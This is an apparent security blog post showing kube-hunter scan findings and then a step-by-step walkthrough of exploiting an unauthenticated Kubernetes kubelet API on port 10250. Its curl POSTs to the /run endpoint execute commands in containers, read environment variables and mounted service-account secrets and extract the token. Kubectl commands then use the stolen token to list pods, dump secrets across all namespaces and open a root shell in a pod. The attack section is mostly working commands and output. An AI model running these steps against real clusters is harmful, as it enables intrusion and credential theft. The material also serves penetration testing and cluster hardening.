<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Privileged Container:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| A Privileged container exist on a node.</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| could expose the node/cluster to unwanted root</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ operations</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Cluster Health Disclosure:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| By accessing the open /healthz handler, an</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| attacker could get the cluster health state without</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ authenticating</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Exposed Pods:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| type: vulnerability</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| host: 1.2.3.4:10255</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| description:</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| An attacker could view sensitive information</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| about pods that are bound to a Node using</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">|_ the /pods endpoint</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">----------</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Nodes</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| TYPE | LOCATION |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Node/Master | 1.2.3.4<span style="white-space: pre;"> </span> |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+-------------+---------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Detected Services</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| SERVICE | LOCATION | DESCRIPTION |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Kubelet API | 1.2.3.4:10255 | The read-only port |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| (readonly) | | on the kubelet |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | serves health |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | probing endpoints, |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | and is relied upon |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | by many kubernetes |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | componenets |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| Etcd | 1.2.3.4:2379 | Etcd is a DB that |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | stores cluster's |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | data, it contains |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | configuration and |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | current state |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | information, and |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | might contain |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | secrets |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server | 1.2.3.4:6443 | The API server is in |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | charge of all |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | operations on the |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | cluster. |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| API Server | 1.2.3.4:443 | The API server is in |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | charge of all |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | operations on the |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">| | | cluster. |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">+----------------------+---------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">Vulnerabilities</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"2.3.8 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Access | using insecure | using HTTP (without | ","etcdcluster":"2.3 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | connection (HTTP) | authorization and | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | authentication), it | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | would allow a | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | potential attacker | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | gain access to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | the etcd | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"2.3.8 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | disclosure | disclosure might | ","etcdcluster":"2.3 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | give an attacker a | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | valuable data to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | attack a cluster | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | K8s Version | The kubernetes | v1.5.6-rc17 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Disclosure | version could be | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | obtained from logs | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | in the /metrics | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | Exposed Pods | An attacker could | count: 68 |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | | view sensitive | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | information about | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | pods that are bound | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | to a Node using the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | /pods endpoint | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Information | Cluster Health | By accessing the | status: ok |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | Disclosure | Disclosure | open /healthz | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | handler, an attacker | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | could get the | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | cluster health state | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | without | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | authenticating | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | Access Event | might expose to an | e":{"dir":true,"node |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | attacker cluster's | ... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | possible exploits, | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | secrets and more. | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| 1.2.3.4:10255 | Access Risk | Privileged Container | A Privileged | pod: node-exporter- |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | container exist on a | 1fmd9-z9685, |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | node. could expose | containe... |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | the node/cluster to | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | unwanted root | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">| | | | operations | |</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">+---------------------+----------------------+----------------------+----------------------+----------------------+</span><br />
<br />
<b>Kubernetes: unauth kublet API 10250 token theft & kubectl</b> (published 2019-01-16)<br />
Kubernetes: unauthenticated kubelet API (10250) token theft & kubectl access & exec<br />
<br />
<br />
kube-hunter output to get us started:
<script src="https://gist.github.com/carnal0wnage/c88e15a99e37b4d090afb77cb56cc4c2.js"></script>
<br />
<br />
Do a <span style="font-family: "courier new" , "courier" , monospace;">curl -sk https://k8-node:10250/runningpods/</span> to get a list of running pods (the kubelet's serving certificate is normally self-signed, hence the <span style="font-family: "courier new" , "courier" , monospace;">-k</span>).<br />
<br />
With that data (namespace, pod name and container name) you can craft the POST request to the kubelet's <span style="font-family: "courier new" , "courier" , monospace;">/run</span> endpoint and execute a command inside the container so we can poke around.<br />
<br />
Example request:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=ls -la /"</span><br />
<br />
Output:<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 35264</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 .</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 0 Nov 9 16:27 .dockerenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 bin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 380 Nov 9 16:27 dev</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 36047205 Apr 13 2018 dnsmasq-nanny</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 etc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 home</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 lib</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 4096 Nov 9 16:27 media</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 mnt</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 134 root root 0 Nov 9 16:27 proc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwx------ 2 root root 4096 Jan 9 2018 root</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 run</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Nov 9 16:27 sbin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 4096 Jan 9 2018 srv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 12 root root 0 Dec 19 19:06 sys</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 1 root root 4096 Nov 9 17:00 tmp</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 7 root root 4096 Nov 9 16:27 usr</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4096 Nov 9 16:27 var</span><br />
<br />
Check the environment and see if the kubelet credentials are in the environment variables. Depending on the cloud provider or hosting provider they are sometimes right there. Otherwise we need to retrieve them from:<br />
1. the mounted service account secret (/var/run/secrets/kubernetes.io/serviceaccount)<br />
2. the cloud metadata URL<br />
<br />
Check the env with the following command:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=env"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
We are looking for the KUBLET_CERT, KUBLET_KEY and CA_CERT environment variables (the kubelet's client certificate and key, plus the cluster CA certificate).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlws7mpWg0AT9kdBP9uOZB9QnLNu3WsL0IRKPziCnusV33ddS2AQzsp4SEf-NoRHpTgjruoP2yTCCHTkubAt4wIgMU3c2CcIHWI7j3bUcKVx7LuKGAIrNdpO25g2h-0WeQfirZctEp6pg/s1600/Screen+Shot+2019-01-09+at+3.42.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="422" data-original-width="1234" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlws7mpWg0AT9kdBP9uOZB9QnLNu3WsL0IRKPziCnusV33ddS2AQzsp4SEf-NoRHpTgjruoP2yTCCHTkubAt4wIgMU3c2CcIHWI7j3bUcKVx7LuKGAIrNdpO25g2h-0WeQfirZctEp6pg/s400/Screen+Shot+2019-01-09+at+3.42.09+PM.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We are also looking for the Kubernetes API server. This is most likely NOT the host you are messing with on 10250; the kubelet injects the in-cluster API server address into every pod's environment, so we are looking for something like:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
KUBERNETES_PORT=tcp://10.10.10.10:443</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
or</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
KUBERNETES_MASTER_NAME: 10.11.12.13:443</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once we have the Kubernetes token or keys we need to talk to the API server to use them; the kubelet on 10250 is not where they get used. The API server may be (if we are lucky) another public IP, or a 10. address that is only reachable from inside the cluster. If it's a 10. IP we need to download kubectl to the pod and run the commands from there.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Assuming they are not in the environment variables, let's look and see if they are there in the mounted secrets:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq"</span><span style="font-family: "courier new" , "courier" , monospace;"> -d "cmd=mount"</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">sample output truncated:</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/k8s/dns/dnsmasq-nanny type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>tmpfs on /var/run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)</b></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/resolv.conf type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/hostname type ext4 (rw,nosuid,nodev,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/dev/sda1 on /etc/hosts type ext4 (rw,relatime,commit=30,data=ordered)</span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: inherit;">We can then cat out the ca.crt, namespace, and token</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq"</span><span style="font-family: "courier new" , "courier" , monospace;"> -d "cmd=ls -la /var/run/secrets/kubernetes.io/serviceaccount"</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: inherit;">Output:</span></div>
<div class="separator" style="clear: both;">
<span style="font-size: x-small;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 4</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxrwxrwt 3 root root 140 Nov 9 16:27 .</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Nov 9 16:27 ..</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 13 Nov 9 16:27 ca.crt -> ..data/ca.crt</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 16 Nov 9 16:27 namespace -> ..data/namespace</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">lrwxrwxrwx 1 root root 12 Nov 9 16:27 token -> ..data/token</span></div>
<br />
and then:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">output:</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">Also grab the ca.crt :-)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
With the token, ca.crt and api server IP address we can issue commands with kubectl.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get pods --all-namespaces</span><br />
<br />
Output:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">NAMESPACE NAME READY STATUS RESTARTS AGE</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system event-exporter-v0.1.9-5c-SNIP 2/2 Running 2 120d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system fluentd-cloud-logging-gke-eeme-api-default-pool 1/1 Running 1 2y</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system heapster-v1.5.2-5-SNIP 3/3 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-dns-5b8-SNIP 4/4 Running 0 61d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-dns-autoscaler-2-SNIP 1/1 Running 1 252d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kube-proxy-gke-eeme-api-default-pool 1/1 Running 1 2y </span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system kubernetes-dashboard-7-SNIP 1/1 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system l7-default-backend-10-SNIP 1/1 Running 0 27d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: xx-small;">kube-system metrics-server-v0.2.1-7-SNIP 2/2 Running 0 120d</span><br />
<br />
At this point you can pull secrets or exec into any available pod. What the token actually lets you do is whatever the cluster's authorization mode grants the stolen service account; <span style="font-family: "courier new" , "courier" , monospace;">kubectl auth can-i --list</span> with the same --server/--certificate-authority/--token flags prints that list.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get secrets --all-namespaces</span><br />
<br />
To get a shell via kubectl, list the pods in a namespace and exec into one:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=</span><span style="font-family: "courier new" , "courier" , monospace;">eyJhbGciOiJSUzI1NiI---SNIP---</span><span style="font-family: "courier new" , "courier" , monospace;"> get pods --namespace=kube-system</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">NAME READY STATUS RESTARTS AGE</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">event-exporter-v0.1.9-5-SNIP 2/2 Running 2 120d</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">--SNIP--</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><b>metrics-server-v0.2.1-7f8ee58c8f-ab13f</b> 2/2 Running 0 120d</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$ kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- -- /bin/sh</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">/ # ls -lah</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">total 40220</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 .</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 ..</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 1 root root 0 Sep 11 07:25 .dockerenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 3 root root 4.0K Sep 11 07:25 apiserver.local.config</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 root root 12.0K Sep 11 07:24 bin</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 5 root root 380 Sep 11 07:25 dev</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Sep 11 07:25 etc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 2 nobody nogroup 4.0K Nov 1 2017 home</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">-rwxr-xr-x 2 root root 39.2M Dec 20 2017 metrics-server</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">dr-xr-xr-x 135 root root 0 Sep 11 07:25 proc</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">drwxr-xr-x 1 root root 4.0K Dec 19 21:33 root</span><br />
